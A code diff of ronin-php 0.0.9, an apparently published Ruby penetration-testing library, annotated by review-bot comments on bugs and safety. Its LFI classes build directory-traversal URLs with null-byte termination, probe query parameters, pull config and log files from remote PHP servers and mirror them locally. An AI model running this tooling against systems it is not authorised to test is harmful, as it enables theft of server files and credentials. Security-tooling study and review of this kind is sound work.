ronin-php 0.0.9

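--- a/data/Rakefile
+++ b/data/Rakefile
@@ -0,0 +1,19 @@
+ # -*- ruby -*-
+
+ require 'rubygems'
+ require 'hoe'
+ require './tasks/spec.rb'
+ require './tasks/static.rb'
+ require './lib/ronin/php/version.rb'
+
+ Hoe.new('ronin-php', Ronin::PHP::VERSION) do |p|
+ p.rubyforge_name = 'ronin'
+ p.developer('Postmodern Modulus III','postmodern.mod3@gmail.com')
+ p.extra_deps = [
+ ['ronin', '>=0.0.9'],
+ 'cssmin',
+ 'jsmin'
+ ]
+ end
+
+ # vim: syntax=Ruby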
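Review bot: The `extra_deps` list leaves every runtime dependency open-ended: `'cssmin'` and `'jsmin'` carry no version constraint at all, and `['ronin', '>=0.0.9']` has no upper bound, so an install resolves to whatever release is newest on the registry at that moment. Bounded constraints keep the installed set reproducible and reviewable, e.g. `['ronin', '~> 0.0.9']` and `['cssmin', '~> <TESTED_VERSION>']` (placeholder: the page does not show which versions were tested). A one-line comment above the list saying why the two minifier gems are needed would also help anyone auditing the dependency tree.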
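--- a/data/lib/ronin/php.rb
+++ b/data/lib/ronin/php.rb
@@ -0,0 +1,27 @@
+ #
+ #--
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
+ # related security tasks.
+ #
+ # Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
+ #
+ # This program is free software; you can redistribute it and/or modify
+ # it under the terms of the GNU General Public License as published by
+ # the Free Software Foundation; either version 2 of the License, or
+ # (at your option) any later version.
+ #
+ # This program is distributed in the hope that it will be useful,
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ # GNU General Public License for more details.
+ #
+ # You should have received a copy of the GNU General Public License
+ # along with this program; if not, write to the Free Software
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+ #++
+ #
+
+ require 'ronin/php/extensions'
+ require 'ronin/php/lfi'
+ require 'ronin/php/rfi'
+ require 'ronin/rpc/php'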
@@ -0,0 +1,24 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/extensions/string'
@@ -0,0 +1,42 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ class String
25
+
26
+ #
27
+ # Returns +true+ if the String contains a PHP Warning message, returns
28
+ # +false+ otherwise.
29
+ #
30
+ def php_warning?
31
+ !((self =~ /<b>Warning<\/b>:\s+/).nil?)
32
+ end
33
+
34
+ #
35
+ # Returns +true+ if the String contains a PHP Error message, returns
36
+ # +false+ otherwise.
37
+ #
38
+ def php_error?
39
+ !((self =~ /<b>Fatal error<\/b>:\s+/).nil?)
40
+ end
41
+
42
+ end
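Review bot: `php_warning?` and `php_error?` are defined on the core `String` class, so every string in any process that loads this file gains them, and the doc comments do not say what the patterns actually match. Both regexes require the `<b>…</b>` markup, so as far as the visible code shows, a plain-text PHP message returns `false`, which a caller can misread as "no error". I would add to each comment something like `# Matches only HTML-formatted PHP messages ("<b>Warning</b>: "); +false+ does not prove the text is error-free.` As a style point, `!((self =~ re).nil?)` can be written `!!(self =~ re)`.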
@@ -0,0 +1,28 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/lfi/exceptions'
25
+ require 'ronin/php/lfi/extensions'
26
+ require 'ronin/php/lfi/target'
27
+ require 'ronin/php/lfi/file'
28
+ require 'ronin/php/lfi/lfi'
@@ -0,0 +1,24 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/lfi/exceptions/unknown_target'
@@ -0,0 +1,31 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ module Ronin
25
+ module PHP
26
+ class LFI
27
+ class UnknownTarget < RuntimeError
28
+ end
29
+ end
30
+ end
31
+ end
@@ -0,0 +1,24 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/lfi/extensions/uri'
@@ -0,0 +1,24 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/lfi/extensions/uri/http'
@@ -0,0 +1,58 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/lfi/lfi'
25
+
26
+ module URI
27
+ class HTTP < Generic
28
+
29
+ def test_lfi(options={})
30
+ up = ((options[:up]) || 0..Ronin::PHP::LFI::MAX_UP)
31
+ vulns = []
32
+
33
+ query_params.each_key do |param|
34
+ lfi = Ronin::PHP::LFI.new(self,param)
35
+
36
+ up.each do |n|
37
+ lfi.up = n
38
+
39
+ if lfi.vulnerable?(options)
40
+ vulns << lfi
41
+ break
42
+ end
43
+ end
44
+ end
45
+
46
+ return vulns
47
+ end
48
+
49
+ def lfi(options={})
50
+ test_lfi(options).first
51
+ end
52
+
53
+ def has_lfi?(options={})
54
+ !(test_lfi(options).empty?)
55
+ end
56
+
57
+ end
58
+ end
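Review bot: In `test_lfi` the default on the first line does not parse the way it reads: `||` binds tighter than `..`, so `((options[:up]) || 0..Ronin::PHP::LFI::MAX_UP)` is evaluated as `(options[:up] || 0)..MAX_UP`. A caller who passes a Range as `:up` therefore gets an `ArgumentError` from building a range out of a range, and an Integer `n` silently becomes `n..MAX_UP`. If the intent is "use the caller's range, else 0..MAX_UP", write `up = (options[:up] || (0..Ronin::PHP::LFI::MAX_UP))`. None of the three methods added to `URI::HTTP` has a doc comment; each should state that calling it issues live HTTP requests, up to one per `up` value for every query parameter, so it must only be run against hosts the operator is authorised to test.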
@@ -0,0 +1,86 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ module Ronin
25
+ module PHP
26
+ class LFI
27
+ class File < StringIO
28
+
29
+ # Path to the file
30
+ attr_reader :path
31
+
32
+ #
33
+ # Creates a new Inclusion with the specified _path_ and response
34
+ # _body_.
35
+ #
36
+ def initialize(path,body)
37
+ super(body)
38
+
39
+ @path = path
40
+ end
41
+
42
+ #
43
+ # Returns the contents of the File in String form.
44
+ #
45
+ def contents
46
+ string
47
+ end
48
+
49
+ #
50
+ # See contents.
51
+ #
52
+ def to_s
53
+ contents
54
+ end
55
+
56
+ def inspect
57
+ "#<#{self.class}:#{@path}>"
58
+ end
59
+
60
+ #
61
+ # Saves the body to specified _destination_, returns the
62
+ # _destination_.
63
+ #
64
+ def save(destination)
65
+ File.open(destination,'w') do |dest|
66
+ dest.write(string)
67
+ end
68
+
69
+ return destination
70
+ end
71
+
72
+ def mirror(base)
73
+ dest = File.join(base,@path)
74
+ dest_dir = File.dirname(dest)
75
+
76
+ unless File.directory?(dest_dir)
77
+ FileUtils.mkdir_p(dest_dir)
78
+ end
79
+
80
+ return save(dest)
81
+ end
82
+
83
+ end
84
+ end
85
+ end
86
+ end
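Review bot: Inside `class File < StringIO` the bare constant `File` resolves to `Ronin::PHP::LFI::File` itself, not to Ruby's `::File`. So `File.open(destination,'w')` in `save` builds another in-memory StringIO and nothing reaches disk, while `File.join`, `File.dirname` and `File.directory?` in `mirror` are not defined on StringIO and would raise `NoMethodError`. Every filesystem call here needs the top-level `::File`, and the hunk shows no `require 'stringio'` or `require 'fileutils'` for the `StringIO` and `FileUtils` names it uses. `mirror` also joins `@path` under `base` without normalising it, so a path containing `..` segments could, if one ever reaches this method, be written outside the mirror directory. The fence below shows both changes, the second as a containment check before any directory is created.
```ruby
def save(destination)
  ::File.open(destination,'w') do |dest|
    dest.write(string)
  end
  # … unchanged: return destination …
end

def mirror(base)
  root = ::File.expand_path(base)
  dest = ::File.expand_path(::File.join(root,@path))

  # refuse to write outside the mirror directory
  unless dest.start_with?(root + ::File::SEPARATOR)
    raise(ArgumentError,"#{@path.dump} resolves outside #{base.dump}")
  end

  dest_dir = ::File.dirname(dest)
  ::FileUtils.mkdir_p(dest_dir) unless ::File.directory?(dest_dir)
  # … unchanged: return save(dest) …
end
```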
@@ -0,0 +1,245 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/lfi/exceptions/unknown_target'
25
+ require 'ronin/php/lfi/target'
26
+ require 'ronin/php/lfi/file'
27
+ require 'ronin/extensions/uri'
28
+ require 'ronin/network/http'
29
+ require 'ronin/path'
30
+
31
+ module Ronin
32
+ module PHP
33
+ class LFI
34
+
35
+ # Maximum number of directories to escape
36
+ MAX_UP = 15
37
+
38
+ # The URL which is vulnerable
39
+ attr_reader :url
40
+
41
+ # The vulnerable query param
42
+ attr_accessor :param
43
+
44
+ # The path prefix
45
+ attr_accessor :prefix
46
+
47
+ # Number of directories to traverse up
48
+ attr_accessor :up
49
+
50
+ # Whether to terminate the LFI path with a null byte
51
+ attr_accessor :terminate
52
+
53
+ # Targeted Operating System (OS)
54
+ attr_accessor :os
55
+
56
+ #
57
+ # Creates a new LFI object with the specified _url_, _param_ and the
58
+ # given _options_. The specified _param_ indicates which query param
59
+ # in the _url_ is vulnerable to Local File Inclusion.
60
+ #
61
+ # _options_ may contain the following keys:
62
+ # <tt>:prefix</tt>:: The path prefix.
63
+ # <tt>:up</tt>:: The number of directories to transverse up. Defaults
64
+ # to 0.
65
+ # <tt>:terminate</tt>:: Whether or not to terminate the LFI path with
66
+ # a null byte. Defaults to +true+.
67
+ # <tt>:os</tt>:: The Operating System to target.
68
+ #
69
+ def initialize(url,param,options={})
70
+ @url = url
71
+ @param = param
72
+
73
+ @prefix = options[:prefix]
74
+ @up = (options[:up] || 0)
75
+
76
+ if options.has_key?(:terminate)
77
+ @terminate = options[:terminate]
78
+ else
79
+ @terminate = true
80
+ end
81
+
82
+ @os = options[:os]
83
+ end
84
+
85
+ #
86
+ # Returns +true+ if the LFI path will be terminated with a null byte,
87
+ # returns +false+ otherwise.
88
+ #
89
+ def terminate?
90
+ @terminate == true
91
+ end
92
+
93
+ #
94
+ # Builds a LFI url to include the specified _path_.
95
+ #
96
+ def url_for(path)
97
+ escape = (@prefix || Path.up(@up))
98
+ full_path = escape.join(path.to_s)
99
+ full_path = "#{full_path}\0" if terminate?
100
+
101
+ new_url = URI(@url.to_s)
102
+ new_url.query_params[@param.to_s] = full_path
103
+
104
+ return new_url
105
+ end
106
+
107
+ #
108
+ # Get the specified _path_ with the given _options_.
109
+ #
110
+ def get(path,options={})
111
+ options = options.merge(:url => url_for(path))
112
+
113
+ if options[:method] == :post
114
+ return Net.http_post_body(options)
115
+ else
116
+ return Net.http_get_body(options)
117
+ end
118
+ end
119
+
120
+ #
121
+ # Include the specified _path_ with the given _options_. Returns a
122
+ # new File object for the included _path_.
123
+ #
124
+ def include(path,options={})
125
+ File.new(path,get(path,options))
126
+ end
127
+
128
+ #
129
+ # Include a targeted file specified by _name_ using the given
130
+ # _options_. Returns a new File object for the included file.
131
+ # If a _block_ is given, it will be passed the newly created File
132
+ # object.
133
+ #
134
+ def include_target(name,options={},&block)
135
+ name = name.to_s
136
+ target = Target.with_file(name)
137
+
138
+ unless target
139
+ raise(UnknownTarget,"unknown target file #{name.dump}",caller)
140
+ end
141
+
142
+ return inclusion_of(target,options,&block)
143
+ end
144
+
145
+ def save_target(name,dest,options={})
146
+ include_target(name,options) do |file|
147
+ file.save(dest)
148
+ end
149
+ end
150
+
151
+ #
152
+ # Includes all targeted config and log files with the given _options_.
153
+ #
154
+ def include_targets(options={},&block)
155
+ (Target.configs + Target.logs).map { |target|
156
+ include_of(target,options,&block)
157
+ }.compact
158
+ end
159
+
160
+ #
161
+ # Mirrors all targeted config and log files to the specifed
162
+ # _directory_ using the given _options_.
163
+ #
164
+ def mirror_targets(directory,options={})
165
+ include_targets(options).map do |file|
166
+ file.mirror(directory)
167
+ end
168
+ end
169
+
170
+ #
171
+ # Returns +true+ if the url is vulnerable to LFI, returns +false+
172
+ # otherwise.
173
+ #
174
+ def vulnerable?(options={})
175
+ Target.tests.each do |target|
176
+ inclusion_of(target) do |file|
177
+ return true
178
+ end
179
+ end
180
+
181
+ return false
182
+ end
183
+
184
+ #
185
+ # Extracts information from all targeted files using the given
186
+ # _options_.
187
+ #
188
+ # _options_ may include the following options:
189
+ # <tt>:oses</tt>:: The Array of OSes to test for.
190
+ #
191
+ def fingerprint(options={})
192
+ data = {}
193
+
194
+ Target.with_extractors.each do |target|
195
+ inclusion_of(target,options) do |file|
196
+ data.merge!(target.extract_from(file.contents))
197
+ end
198
+ end
199
+
200
+ return data
201
+ end
202
+
203
+ #
204
+ # Returns the String form of the url.
205
+ #
206
+ def to_s
207
+ @url.to_s
208
+ end
209
+
210
+ protected
211
+
212
+ #
213
+ # Returns the available paths of the specified _target_.
214
+ #
215
+ def paths_of(target)
216
+ if @os
217
+ return target.paths_for(@os)
218
+ else
219
+ return target.all_paths
220
+ end
221
+ end
222
+
223
+ #
224
+ # Returns the File object obtained via the specified _target_
225
+ # and the given _options_. If a _block_ is given, it will be passed
226
+ # the new File object.
227
+ #
228
+ def inclusion_of(target,options={},&block)
229
+ paths_of(target).each do |path|
230
+ body = get(path,options)
231
+
232
+ if target.included_in?(body)
233
+ file = File.new(path,body)
234
+
235
+ block.call(file) if block
236
+ return file
237
+ end
238
+ end
239
+
240
+ return nil
241
+ end
242
+
243
+ end
244
+ end
245
+ end
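Review bot: `include_targets` calls `include_of(target,options,&block)`, but no method of that name is defined anywhere in this hunk; the helper under `protected` is `inclusion_of`. As written, `include_targets` would raise `NoMethodError`, and so would `mirror_targets`, which depends on it; the call should read `inclusion_of(target,options,&block)`. `vulnerable?(options={})` has a related defect: it accepts `options` but calls `inclusion_of(target)` without them, so anything the caller passes (for example `:method => :post`, which `get` checks) is silently dropped; it should be `inclusion_of(target,options) do |file|`. `save_target` is also the only public method here without a doc comment.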